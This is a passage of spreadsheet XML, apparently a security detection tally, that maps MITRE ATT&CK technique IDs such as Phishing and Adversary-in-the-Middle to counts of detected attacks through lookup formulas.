      <c r="AH53" s="392"/>
      <c r="AI53" s="16"/>
      <c r="AJ53" s="394"/>
      <c r="AK53" s="392"/>
      <c r="AL53" s="392"/>
      <c r="AM53" s="322"/>
      <c r="AN53" s="392"/>
      <c r="AO53" s="16"/>
      <c r="AP53" s="394"/>
      <c r="AQ53" s="292"/>
      <c r="AR53" s="322"/>
      <c r="AS53" s="322"/>
      <c r="AT53" s="12"/>
      <c r="AU53" s="13"/>
      <c r="AV53" s="394"/>
      <c r="AW53" s="392"/>
      <c r="AX53" s="392"/>
      <c r="AY53" s="322"/>
      <c r="BA53" s="16"/>
      <c r="BB53" s="394"/>
      <c r="BC53" s="292"/>
      <c r="BD53" s="322"/>
      <c r="BE53" s="322"/>
      <c r="BF53" s="12"/>
      <c r="BG53" s="13"/>
      <c r="BH53" s="394"/>
      <c r="BI53" s="292">
        <v>0</v>
      </c>
      <c r="BJ53" s="322">
        <v>0</v>
      </c>
      <c r="BK53" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL53" s="12">
        <v>0</v>
      </c>
      <c r="BM53" s="13">
        <v>0</v>
      </c>
      <c r="BN53" s="394">
        <v>0</v>
      </c>
      <c r="BO53" s="292">
        <v>72</v>
      </c>
      <c r="BP53" s="322">
        <v>72</v>
      </c>
      <c r="BQ53" s="322" t="str">
        <f t="shared" si="1"/>
        <v>72 (72)</v>
      </c>
      <c r="BR53" s="12">
        <v>0</v>
      </c>
      <c r="BS53" s="12">
        <v>4</v>
      </c>
      <c r="BT53" s="13">
        <v>1</v>
      </c>
      <c r="BU53" s="394">
        <v>72</v>
      </c>
      <c r="BV53" s="292">
        <v>0</v>
      </c>
      <c r="BW53" s="322">
        <v>0</v>
      </c>
      <c r="BX53" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY53" s="12">
        <v>0</v>
      </c>
      <c r="BZ53" s="13">
        <v>0</v>
      </c>
      <c r="CA53" s="394">
        <v>0</v>
      </c>
      <c r="CB53" s="292">
        <v>0</v>
      </c>
      <c r="CC53" s="322">
        <v>0</v>
      </c>
      <c r="CD53" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE53" s="12">
        <v>0</v>
      </c>
      <c r="CF53" s="12">
        <v>0</v>
      </c>
      <c r="CG53" s="13">
        <v>0</v>
      </c>
      <c r="CH53" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:86" ht="15" customHeight="1">
      <c r="A54" s="4">
        <f t="shared" si="3"/>
        <v>52</v>
      </c>
      <c r="B54" s="4" t="str">
        <f>IFERROR(VLOOKUP(A54,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1542</v>
      </c>
      <c r="C54" s="493" t="str">
        <f>IFERROR(VLOOKUP(B54,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Pre-OS Boot</v>
      </c>
      <c r="D54" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B54)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E54" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>13</v>
      </c>
      <c r="F54" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (13)</v>
      </c>
      <c r="G54" s="292"/>
      <c r="H54" s="322"/>
      <c r="I54" s="322"/>
      <c r="J54" s="12"/>
      <c r="K54" s="13"/>
      <c r="L54" s="394"/>
      <c r="M54" s="322"/>
      <c r="N54" s="322"/>
      <c r="O54" s="322"/>
      <c r="P54" s="12"/>
      <c r="Q54" s="13"/>
      <c r="R54" s="394"/>
      <c r="S54" s="292"/>
      <c r="T54" s="322"/>
      <c r="U54" s="322"/>
      <c r="V54" s="12"/>
      <c r="W54" s="13"/>
      <c r="X54" s="394"/>
      <c r="Y54" s="392"/>
      <c r="Z54" s="392"/>
      <c r="AA54" s="322"/>
      <c r="AB54" s="392"/>
      <c r="AC54" s="16"/>
      <c r="AD54" s="394"/>
      <c r="AE54" s="392"/>
      <c r="AF54" s="392"/>
      <c r="AG54" s="322"/>
      <c r="AH54" s="392"/>
      <c r="AI54" s="16"/>
      <c r="AJ54" s="394"/>
      <c r="AK54" s="392"/>
      <c r="AL54" s="392"/>
      <c r="AM54" s="322"/>
      <c r="AN54" s="392"/>
      <c r="AO54" s="16"/>
      <c r="AP54" s="394"/>
      <c r="AQ54" s="292"/>
      <c r="AR54" s="322"/>
      <c r="AS54" s="322"/>
      <c r="AT54" s="12"/>
      <c r="AU54" s="13"/>
      <c r="AV54" s="394"/>
      <c r="AW54" s="392"/>
      <c r="AX54" s="392"/>
      <c r="AY54" s="322"/>
      <c r="BA54" s="16"/>
      <c r="BB54" s="394"/>
      <c r="BC54" s="292"/>
      <c r="BD54" s="322"/>
      <c r="BE54" s="322"/>
      <c r="BF54" s="12"/>
      <c r="BG54" s="13"/>
      <c r="BH54" s="394"/>
      <c r="BI54" s="292">
        <v>3</v>
      </c>
      <c r="BJ54" s="322">
        <v>2</v>
      </c>
      <c r="BK54" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (3)</v>
      </c>
      <c r="BL54" s="12">
        <v>1</v>
      </c>
      <c r="BM54" s="13">
        <v>1</v>
      </c>
      <c r="BN54" s="394">
        <v>2</v>
      </c>
      <c r="BO54" s="292">
        <v>6</v>
      </c>
      <c r="BP54" s="322">
        <v>5</v>
      </c>
      <c r="BQ54" s="322" t="str">
        <f t="shared" si="1"/>
        <v>5 (6)</v>
      </c>
      <c r="BR54" s="12">
        <v>1</v>
      </c>
      <c r="BS54" s="12">
        <v>3</v>
      </c>
      <c r="BT54" s="13">
        <v>1</v>
      </c>
      <c r="BU54" s="394">
        <v>4</v>
      </c>
      <c r="BV54" s="292">
        <v>0</v>
      </c>
      <c r="BW54" s="322">
        <v>0</v>
      </c>
      <c r="BX54" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY54" s="12">
        <v>0</v>
      </c>
      <c r="BZ54" s="13">
        <v>0</v>
      </c>
      <c r="CA54" s="394">
        <v>0</v>
      </c>
      <c r="CB54" s="292">
        <v>0</v>
      </c>
      <c r="CC54" s="322">
        <v>0</v>
      </c>
      <c r="CD54" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE54" s="12">
        <v>0</v>
      </c>
      <c r="CF54" s="12">
        <v>0</v>
      </c>
      <c r="CG54" s="13">
        <v>0</v>
      </c>
      <c r="CH54" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:86" ht="15" customHeight="1">
      <c r="A55" s="4">
        <f t="shared" si="3"/>
        <v>53</v>
      </c>
      <c r="B55" s="4" t="str">
        <f>IFERROR(VLOOKUP(A55,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1543</v>
      </c>
      <c r="C55" s="493" t="str">
        <f>IFERROR(VLOOKUP(B55,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Create or Modify System Process</v>
      </c>
      <c r="D55" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B55)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E55" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F55" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (3)</v>
      </c>
      <c r="G55" s="292"/>
      <c r="H55" s="322"/>
      <c r="I55" s="322"/>
      <c r="J55" s="12"/>
      <c r="K55" s="13"/>
      <c r="L55" s="394"/>
      <c r="M55" s="322"/>
      <c r="N55" s="322"/>
      <c r="O55" s="322"/>
      <c r="P55" s="12"/>
      <c r="Q55" s="13"/>
      <c r="R55" s="394"/>
      <c r="S55" s="292"/>
      <c r="T55" s="322"/>
      <c r="U55" s="322"/>
      <c r="V55" s="12"/>
      <c r="W55" s="13"/>
      <c r="X55" s="394"/>
      <c r="Y55" s="392"/>
      <c r="Z55" s="392"/>
      <c r="AA55" s="322"/>
      <c r="AB55" s="392"/>
      <c r="AC55" s="16"/>
      <c r="AD55" s="394"/>
      <c r="AE55" s="392"/>
      <c r="AF55" s="392"/>
      <c r="AG55" s="322"/>
      <c r="AH55" s="392"/>
      <c r="AI55" s="16"/>
      <c r="AJ55" s="394"/>
      <c r="AK55" s="392"/>
      <c r="AL55" s="392"/>
      <c r="AM55" s="322"/>
      <c r="AN55" s="392"/>
      <c r="AO55" s="16"/>
      <c r="AP55" s="394"/>
      <c r="AQ55" s="292"/>
      <c r="AR55" s="322"/>
      <c r="AS55" s="322"/>
      <c r="AT55" s="12"/>
      <c r="AU55" s="13"/>
      <c r="AV55" s="394"/>
      <c r="AW55" s="392"/>
      <c r="AX55" s="392"/>
      <c r="AY55" s="322"/>
      <c r="BA55" s="16"/>
      <c r="BB55" s="394"/>
      <c r="BC55" s="292"/>
      <c r="BD55" s="322"/>
      <c r="BE55" s="322"/>
      <c r="BF55" s="12"/>
      <c r="BG55" s="13"/>
      <c r="BH55" s="394"/>
      <c r="BI55" s="292">
        <v>5</v>
      </c>
      <c r="BJ55" s="322">
        <v>3</v>
      </c>
      <c r="BK55" s="322" t="str">
        <f t="shared" si="0"/>
        <v>3 (5)</v>
      </c>
      <c r="BL55" s="12">
        <v>2</v>
      </c>
      <c r="BM55" s="13">
        <v>1</v>
      </c>
      <c r="BN55" s="394">
        <v>2</v>
      </c>
      <c r="BO55" s="292">
        <v>5</v>
      </c>
      <c r="BP55" s="322">
        <v>3</v>
      </c>
      <c r="BQ55" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (5)</v>
      </c>
      <c r="BR55" s="12">
        <v>2</v>
      </c>
      <c r="BS55" s="12">
        <v>0</v>
      </c>
      <c r="BT55" s="13">
        <v>1</v>
      </c>
      <c r="BU55" s="394">
        <v>2</v>
      </c>
      <c r="BV55" s="292">
        <v>0</v>
      </c>
      <c r="BW55" s="322">
        <v>0</v>
      </c>
      <c r="BX55" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY55" s="12">
        <v>0</v>
      </c>
      <c r="BZ55" s="13">
        <v>0</v>
      </c>
      <c r="CA55" s="394">
        <v>0</v>
      </c>
      <c r="CB55" s="292">
        <v>0</v>
      </c>
      <c r="CC55" s="322">
        <v>0</v>
      </c>
      <c r="CD55" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE55" s="12">
        <v>0</v>
      </c>
      <c r="CF55" s="12">
        <v>0</v>
      </c>
      <c r="CG55" s="13">
        <v>0</v>
      </c>
      <c r="CH55" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:86" ht="15" customHeight="1">
      <c r="A56" s="4">
        <f t="shared" si="3"/>
        <v>54</v>
      </c>
      <c r="B56" s="4" t="str">
        <f>IFERROR(VLOOKUP(A56,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1557</v>
      </c>
      <c r="C56" s="493" t="str">
        <f>IFERROR(VLOOKUP(B56,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Adversary-in-the-Middle</v>
      </c>
      <c r="D56" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B56)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E56" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F56" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (5)</v>
      </c>
      <c r="G56" s="292"/>
      <c r="H56" s="322"/>
      <c r="I56" s="322"/>
      <c r="J56" s="12"/>
      <c r="K56" s="13"/>
      <c r="L56" s="394"/>
      <c r="M56" s="322"/>
      <c r="N56" s="322"/>
      <c r="O56" s="322"/>
      <c r="P56" s="12"/>
      <c r="Q56" s="13"/>
      <c r="R56" s="394"/>
      <c r="S56" s="292"/>
      <c r="T56" s="322"/>
      <c r="U56" s="322"/>
      <c r="V56" s="12"/>
      <c r="W56" s="13"/>
      <c r="X56" s="394"/>
      <c r="Y56" s="392"/>
      <c r="Z56" s="392"/>
      <c r="AA56" s="322"/>
      <c r="AB56" s="392"/>
      <c r="AC56" s="16"/>
      <c r="AD56" s="394"/>
      <c r="AE56" s="392"/>
      <c r="AF56" s="392"/>
      <c r="AG56" s="322"/>
      <c r="AH56" s="392"/>
      <c r="AI56" s="16"/>
      <c r="AJ56" s="394"/>
      <c r="AK56" s="392"/>
      <c r="AL56" s="392"/>
      <c r="AM56" s="322"/>
      <c r="AN56" s="392"/>
      <c r="AO56" s="16"/>
      <c r="AP56" s="394"/>
      <c r="AQ56" s="292"/>
      <c r="AR56" s="322"/>
      <c r="AS56" s="322"/>
      <c r="AT56" s="12"/>
      <c r="AU56" s="13"/>
      <c r="AV56" s="394"/>
      <c r="AW56" s="392"/>
      <c r="AX56" s="392"/>
      <c r="AY56" s="322"/>
      <c r="BA56" s="16"/>
      <c r="BB56" s="394"/>
      <c r="BC56" s="292"/>
      <c r="BD56" s="322"/>
      <c r="BE56" s="322"/>
      <c r="BF56" s="12"/>
      <c r="BG56" s="13"/>
      <c r="BH56" s="394"/>
      <c r="BI56" s="292">
        <v>0</v>
      </c>
      <c r="BJ56" s="322">
        <v>0</v>
      </c>
      <c r="BK56" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL56" s="12">
        <v>0</v>
      </c>
      <c r="BM56" s="13">
        <v>0</v>
      </c>
      <c r="BN56" s="394">
        <v>0</v>
      </c>
      <c r="BO56" s="292">
        <v>6</v>
      </c>
      <c r="BP56" s="322">
        <v>6</v>
      </c>
      <c r="BQ56" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (6)</v>
      </c>
      <c r="BR56" s="12">
        <v>0</v>
      </c>
      <c r="BS56" s="12">
        <v>4</v>
      </c>
      <c r="BT56" s="13">
        <v>1</v>
      </c>
      <c r="BU56" s="394">
        <v>5</v>
      </c>
      <c r="BV56" s="292">
        <v>0</v>
      </c>
      <c r="BW56" s="322">
        <v>0</v>
      </c>
      <c r="BX56" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY56" s="12">
        <v>0</v>
      </c>
      <c r="BZ56" s="13">
        <v>0</v>
      </c>
      <c r="CA56" s="394">
        <v>0</v>
      </c>
      <c r="CB56" s="292">
        <v>0</v>
      </c>
      <c r="CC56" s="322">
        <v>0</v>
      </c>
      <c r="CD56" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE56" s="12">
        <v>0</v>
      </c>
      <c r="CF56" s="12">
        <v>0</v>
      </c>
      <c r="CG56" s="13">
        <v>0</v>
      </c>
      <c r="CH56" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:86" ht="15" customHeight="1">
      <c r="A57" s="4">
        <f t="shared" si="3"/>
        <v>55</v>
      </c>
      <c r="B57" s="4" t="str">
        <f>IFERROR(VLOOKUP(A57,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1563</v>
      </c>
      <c r="C57" s="493" t="str">
        <f>IFERROR(VLOOKUP(B57,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Service Session Hijacking</v>
      </c>
      <c r="D57" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B57)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E57" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>97</v>
      </c>
      <c r="F57" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (97)</v>
      </c>
      <c r="G57" s="292"/>
      <c r="H57" s="322"/>
      <c r="I57" s="322"/>
      <c r="J57" s="12"/>
      <c r="K57" s="13"/>
      <c r="L57" s="394"/>
      <c r="M57" s="322"/>
      <c r="N57" s="322"/>
      <c r="O57" s="322"/>
      <c r="P57" s="12"/>
      <c r="Q57" s="13"/>
      <c r="R57" s="394"/>
      <c r="S57" s="292"/>
      <c r="T57" s="322"/>
      <c r="U57" s="322"/>
      <c r="V57" s="12"/>
      <c r="W57" s="13"/>
      <c r="X57" s="394"/>
      <c r="Y57" s="392"/>
      <c r="Z57" s="392"/>
      <c r="AA57" s="322"/>
      <c r="AB57" s="392"/>
      <c r="AC57" s="16"/>
      <c r="AD57" s="394"/>
      <c r="AE57" s="392"/>
      <c r="AF57" s="392"/>
      <c r="AG57" s="322"/>
      <c r="AH57" s="392"/>
      <c r="AI57" s="16"/>
      <c r="AJ57" s="394"/>
      <c r="AK57" s="392"/>
      <c r="AL57" s="392"/>
      <c r="AM57" s="322"/>
      <c r="AN57" s="392"/>
      <c r="AO57" s="16"/>
      <c r="AP57" s="394"/>
      <c r="AQ57" s="292"/>
      <c r="AR57" s="322"/>
      <c r="AS57" s="322"/>
      <c r="AT57" s="12"/>
      <c r="AU57" s="13"/>
      <c r="AV57" s="394"/>
      <c r="AW57" s="392"/>
      <c r="AX57" s="392"/>
      <c r="AY57" s="322"/>
      <c r="BA57" s="16"/>
      <c r="BB57" s="394"/>
      <c r="BC57" s="292"/>
      <c r="BD57" s="322"/>
      <c r="BE57" s="322"/>
      <c r="BF57" s="12"/>
      <c r="BG57" s="13"/>
      <c r="BH57" s="394"/>
      <c r="BI57" s="292">
        <v>0</v>
      </c>
      <c r="BJ57" s="322">
        <v>0</v>
      </c>
      <c r="BK57" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL57" s="12">
        <v>0</v>
      </c>
      <c r="BM57" s="13">
        <v>0</v>
      </c>
      <c r="BN57" s="394">
        <v>0</v>
      </c>
      <c r="BO57" s="292">
        <v>74</v>
      </c>
      <c r="BP57" s="322">
        <v>73</v>
      </c>
      <c r="BQ57" s="322" t="str">
        <f t="shared" si="1"/>
        <v>73 (74)</v>
      </c>
      <c r="BR57" s="12">
        <v>0</v>
      </c>
      <c r="BS57" s="12">
        <v>11</v>
      </c>
      <c r="BT57" s="13">
        <v>1</v>
      </c>
      <c r="BU57" s="394">
        <v>72</v>
      </c>
      <c r="BV57" s="292">
        <v>0</v>
      </c>
      <c r="BW57" s="322">
        <v>0</v>
      </c>
      <c r="BX57" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY57" s="12">
        <v>0</v>
      </c>
      <c r="BZ57" s="13">
        <v>0</v>
      </c>
      <c r="CA57" s="394">
        <v>0</v>
      </c>
      <c r="CB57" s="292">
        <v>0</v>
      </c>
      <c r="CC57" s="322">
        <v>0</v>
      </c>
      <c r="CD57" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE57" s="12">
        <v>0</v>
      </c>
      <c r="CF57" s="12">
        <v>0</v>
      </c>
      <c r="CG57" s="13">
        <v>0</v>
      </c>
      <c r="CH57" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:86" ht="15" customHeight="1">
      <c r="A58" s="4">
        <f t="shared" si="3"/>
        <v>56</v>
      </c>
      <c r="B58" s="4" t="str">
        <f>IFERROR(VLOOKUP(A58,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1565</v>
      </c>
      <c r="C58" s="493" t="str">
        <f>IFERROR(VLOOKUP(B58,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Manipulation</v>
      </c>
      <c r="D58" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B58)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E58" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F58" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="G58" s="292"/>
      <c r="H58" s="322"/>
      <c r="I58" s="322"/>
      <c r="J58" s="12"/>
      <c r="K58" s="13"/>
      <c r="L58" s="394"/>
      <c r="M58" s="322"/>
      <c r="N58" s="322"/>
      <c r="O58" s="322"/>
      <c r="P58" s="12"/>
      <c r="Q58" s="13"/>
      <c r="R58" s="394"/>
      <c r="S58" s="292"/>
      <c r="T58" s="322"/>
      <c r="U58" s="322"/>
      <c r="V58" s="12"/>
      <c r="W58" s="13"/>
      <c r="X58" s="394"/>
      <c r="Y58" s="392"/>
      <c r="Z58" s="392"/>
      <c r="AA58" s="322"/>
      <c r="AB58" s="392"/>
      <c r="AC58" s="16"/>
      <c r="AD58" s="394"/>
      <c r="AE58" s="392"/>
      <c r="AF58" s="392"/>
      <c r="AG58" s="322"/>
      <c r="AH58" s="392"/>
      <c r="AI58" s="16"/>
      <c r="AJ58" s="394"/>
      <c r="AK58" s="392"/>
      <c r="AL58" s="392"/>
      <c r="AM58" s="322"/>
      <c r="AN58" s="392"/>
      <c r="AO58" s="16"/>
      <c r="AP58" s="394"/>
      <c r="AQ58" s="292"/>
      <c r="AR58" s="322"/>
      <c r="AS58" s="322"/>
      <c r="AT58" s="12"/>
      <c r="AU58" s="13"/>
      <c r="AV58" s="394"/>
      <c r="AW58" s="392"/>
      <c r="AX58" s="392"/>
      <c r="AY58" s="322"/>
      <c r="BA58" s="16"/>
      <c r="BB58" s="394"/>
      <c r="BC58" s="292"/>
      <c r="BD58" s="322"/>
      <c r="BE58" s="322"/>
      <c r="BF58" s="12"/>
      <c r="BG58" s="13"/>
      <c r="BH58" s="394"/>
      <c r="BI58" s="292">
        <v>0</v>
      </c>
      <c r="BJ58" s="322">
        <v>0</v>
      </c>
      <c r="BK58" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL58" s="12">
        <v>0</v>
      </c>
      <c r="BM58" s="13">
        <v>0</v>
      </c>
      <c r="BN58" s="394">
        <v>0</v>
      </c>
      <c r="BO58" s="292">
        <v>1</v>
      </c>
      <c r="BP58" s="322">
        <v>1</v>
      </c>
      <c r="BQ58" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="BR58" s="12">
        <v>0</v>
      </c>
      <c r="BS58" s="12">
        <v>1</v>
      </c>
      <c r="BT58" s="13">
        <v>1</v>
      </c>
      <c r="BU58" s="394">
        <v>1</v>
      </c>
      <c r="BV58" s="292">
        <v>0</v>
      </c>
      <c r="BW58" s="322">
        <v>0</v>
      </c>
      <c r="BX58" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY58" s="12">
        <v>0</v>
      </c>
      <c r="BZ58" s="13">
        <v>0</v>
      </c>
      <c r="CA58" s="394">
        <v>0</v>
      </c>
      <c r="CB58" s="292">
        <v>0</v>
      </c>
      <c r="CC58" s="322">
        <v>0</v>
      </c>
      <c r="CD58" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE58" s="12">
        <v>0</v>
      </c>
      <c r="CF58" s="12">
        <v>0</v>
      </c>
      <c r="CG58" s="13">
        <v>0</v>
      </c>
      <c r="CH58" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:86" ht="15" customHeight="1">
      <c r="A59" s="4">
        <f t="shared" si="3"/>
        <v>57</v>
      </c>
      <c r="B59" s="4" t="str">
        <f>IFERROR(VLOOKUP(A59,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1566</v>
      </c>
      <c r="C59" s="493" t="str">
        <f>IFERROR(VLOOKUP(B59,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Phishing</v>
      </c>
      <c r="D59" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B59)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E59" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>172</v>
      </c>
      <c r="F59" s="579" t="str">
        <f t="shared" si="4"/>
        <v>2 (172)</v>
      </c>
      <c r="G59" s="292"/>
      <c r="H59" s="322"/>
      <c r="I59" s="322"/>
      <c r="J59" s="12"/>
      <c r="K59" s="13"/>
      <c r="L59" s="394"/>
      <c r="M59" s="322"/>
      <c r="N59" s="322"/>
      <c r="O59" s="322"/>
      <c r="P59" s="12"/>
      <c r="Q59" s="13"/>
      <c r="R59" s="394"/>
      <c r="S59" s="292"/>
      <c r="T59" s="322"/>
      <c r="U59" s="322"/>
      <c r="V59" s="12"/>
      <c r="W59" s="13"/>
      <c r="X59" s="394"/>
      <c r="Y59" s="392"/>
      <c r="Z59" s="392"/>
      <c r="AA59" s="322"/>
      <c r="AB59" s="392"/>
      <c r="AC59" s="16"/>
      <c r="AD59" s="394"/>
      <c r="AE59" s="392"/>
      <c r="AF59" s="392"/>
      <c r="AG59" s="322"/>
      <c r="AH59" s="392"/>
      <c r="AI59" s="16"/>
      <c r="AJ59" s="394"/>
      <c r="AK59" s="392"/>
      <c r="AL59" s="392"/>
      <c r="AM59" s="322"/>
      <c r="AN59" s="392"/>
      <c r="AO59" s="16"/>
      <c r="AP59" s="394"/>
      <c r="AQ59" s="292"/>
      <c r="AR59" s="322"/>
      <c r="AS59" s="322"/>
      <c r="AT59" s="12"/>
      <c r="AU59" s="13"/>
      <c r="AV59" s="394"/>
      <c r="AW59" s="392"/>
      <c r="AX59" s="392"/>
      <c r="AY59" s="322"/>
      <c r="BA59" s="16"/>
      <c r="BB59" s="394"/>
      <c r="BC59" s="292"/>
      <c r="BD59" s="322"/>
      <c r="BE59" s="322"/>
      <c r="BF59" s="12"/>
      <c r="BG59" s="13"/>
      <c r="BH59" s="394"/>
      <c r="BI59" s="292">
        <v>1</v>
      </c>
      <c r="BJ59" s="322">
        <v>1</v>
      </c>
      <c r="BK59" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="BL59" s="12">
        <v>1</v>
      </c>
      <c r="BM59" s="13">
        <v>0.5</v>
      </c>
      <c r="BN59" s="394">
        <v>1</v>
      </c>
      <c r="BO59" s="292">
        <v>167</v>
      </c>
      <c r="BP59" s="322">
        <v>167</v>
      </c>
      <c r="BQ59" s="322" t="str">
        <f t="shared" si="1"/>
        <v>167 (167)</v>
      </c>
      <c r="BR59" s="12">
        <v>1</v>
      </c>
      <c r="BS59" s="12">
        <v>4</v>
      </c>
      <c r="BT59" s="13">
        <v>1</v>
      </c>
      <c r="BU59" s="394">
        <v>167</v>
      </c>
      <c r="BV59" s="292">
        <v>2</v>
      </c>
      <c r="BW59" s="322">
        <v>2</v>
      </c>
      <c r="BX59" s="322" t="str">
        <f t="shared" si="2"/>
        <v>2 (2)</v>
      </c>
      <c r="BY59" s="12">
        <v>2</v>
      </c>
      <c r="BZ59" s="13">
        <v>1</v>
      </c>
      <c r="CA59" s="394">
        <v>2</v>
      </c>
      <c r="CB59" s="292">
        <v>2</v>
      </c>
      <c r="CC59" s="322">
        <v>2</v>
      </c>
      <c r="CD59" s="322" t="s">
        <v>4742</v>
      </c>
      <c r="CE59" s="12">
        <v>2</v>
      </c>
      <c r="CF59" s="12">
        <v>0</v>
      </c>
      <c r="CG59" s="13">
        <v>1</v>
      </c>
      <c r="CH59" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="60" spans="1:86" ht="15" customHeight="1">
      <c r="A60" s="4">
        <f t="shared" si="3"/>
        <v>58</v>
      </c>
      <c r="B60" s="4" t="str">
        <f>IFERROR(VLOOKUP(A60,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1567</v>
      </c>
      <c r="C60" s="493" t="str">
        <f>IFERROR(VLOOKUP(B60,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Web Service</v>
      </c>
      <c r="D60" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B60)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E60" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>26</v>
      </c>
      <c r="F60" s="579" t="str">
        <f t="shared" si="4"/>
